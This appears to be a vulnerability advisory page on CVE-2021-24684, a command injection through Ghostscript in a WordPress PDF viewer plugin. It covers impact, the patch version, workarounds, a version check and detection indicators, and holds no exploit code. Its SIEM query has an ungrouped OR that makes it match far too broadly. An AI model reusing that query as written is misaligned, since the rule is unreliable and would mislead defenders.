Login Sign Up

CVE-2021-24684

8.8 HIGH
Remote Code Execution

📋 TL;DR

This vulnerability allows users with Author roles in WordPress to execute arbitrary operating system commands on the server via OS command injection in the PDF Light Viewer plugin when invoking Ghostscript. Attackers can gain full control of the affected server. WordPress sites using vulnerable versions of this plugin are affected.

💻 Affected Systems

Products:
  • WordPress PDF Light Viewer Plugin
Versions: Versions before 1.4.12
Operating Systems: All operating systems where Ghostscript is installed
Default Config Vulnerable: ⚠️ Yes
Notes: Requires Ghostscript to be installed on the server and Author-level user access in WordPress.

📦 What is this software?

Pdf Light Viewer by Teamlead

View all CVEs affecting Pdf Light Viewer →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Complete server compromise allowing attackers to install malware, steal data, pivot to other systems, or use the server for further attacks.

🟠

Likely Case

Attackers gain shell access to the web server, allowing them to deface websites, install backdoors, or exfiltrate sensitive data.

🟢

If Mitigated

Limited impact if proper network segmentation and least privilege principles are implemented, though web server compromise still possible.

🌐 Internet-Facing: HIGH
🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: LIKELY
Unauthenticated Exploit: ✅ No
Complexity: LOW

Exploitation requires Author-level WordPress user credentials. Public proof-of-concept code is available.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 1.4.12

Vendor Advisory: https://wpscan.com/vulnerability/b5295bf9-8cf6-416e-b215-074742a5fc63

Restart Required: No

Instructions:

1. Log into WordPress admin panel. 2. Navigate to Plugins → Installed Plugins. 3. Find 'PDF Light Viewer' plugin. 4. Click 'Update Now' if update available. 5. If no update available, download version 1.4.12+ from WordPress repository and manually update.

🔧 Temporary Workarounds

Remove Ghostscript

linux

Uninstall Ghostscript from the server to prevent command execution

sudo apt-get remove ghostscript
sudo yum remove ghostscript

Restrict Author Role Access

all

Temporarily remove Author role users or restrict their capabilities

🧯 If You Can't Patch

  • Disable the PDF Light Viewer plugin immediately
  • Implement network segmentation to isolate the web server from critical systems

🔍 How to Verify

Check if Vulnerable:

Check WordPress admin panel → Plugins → Installed Plugins → PDF Light Viewer version. If version is below 1.4.12, you are vulnerable.

Check Version:

wp plugin list --name='pdf-light-viewer' --field=version

Verify Fix Applied:

Confirm plugin version is 1.4.12 or higher in WordPress admin panel.

📡 Detection & Monitoring

Log Indicators:

  • Unusual Ghostscript process executions
  • Command injection patterns in web server logs
  • Author user accounts performing unexpected actions

Network Indicators:

  • Unexpected outbound connections from web server
  • Command and control traffic patterns

SIEM Query:

source="web_server_logs" AND (process="ghostscript" OR command="gs") AND user="www-data" OR user="apache"

📊 Metadata

CVE ID: CVE-2021-24684
CVSS v3 Score: 8.8 (HIGH)
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
CWE: CWE-78
Published: October 18, 2021
Last Updated: November 21, 2024

🔗 References

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2021-24684, you might also want to check these:

CVE-2023-2564 10.0

This CVE describes an OS command injection vulnerability in scanservjs web scanning software that al...

Same vulnerability type (CWE-78)
CVE-2024-58338 10.0

Anevia Flamingo XL 3.2.9 contains a restricted shell escape vulnerability that allows remote attacke...

Same vulnerability type (CWE-78)
CVE-2025-26389 10.0

This critical vulnerability allows unauthenticated remote attackers to execute arbitrary code with r...

Same vulnerability type (CWE-78)